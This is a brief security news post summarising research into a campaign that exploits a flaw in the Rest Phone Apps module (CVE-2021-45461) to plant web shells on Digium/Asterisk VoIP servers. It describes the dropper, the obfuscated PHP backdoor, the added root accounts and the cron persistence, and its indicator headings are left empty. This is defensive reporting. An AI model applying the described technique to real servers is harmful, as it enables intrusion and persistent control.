Site icon TheCyberThrone

Digium Phone Flaws

PravinKarthik
Advertisements

Researchers has took a campaign in to limelight targeting the Elastix system used in Digium phones.

Tracked as  CVE-2021-45461 with CVSS of 9.8 , exist in the Rest Phone Apps module to implant a web shell on VoIP servers. The attackers used the web shell to exfiltrate data by dropping additional payloads inside the target’s Digium phone software.

Advertisements

A high volume of malicious traffic likely originating from more than 500,000 unique samples over the period spanning from mid-December 2021 till the end of March 2022. The traffic targets Digium open source Asterisk communication software for VoIP phone devices.

The attack chains start with a code retrieving a shell script dropper from a remote server, which, in turn, downloads and executes obfuscated PHP backdoor in multiple locations in the file system.

The PHP backdoor also creates several root user accounts and set up a scheduled task to maintain the persistence and re-infect the host system.

The malware supports arbitrary commands via the cmd request parameter along with built-in default commands that can allow operators to carry out malicious activities.

Advertisements

This research was conducted and documented by researchers from Palo Alto Networks

Indicators of Compromise

Original Shell Scripts – SHA256 hashes

Local Filepaths

Exit mobile version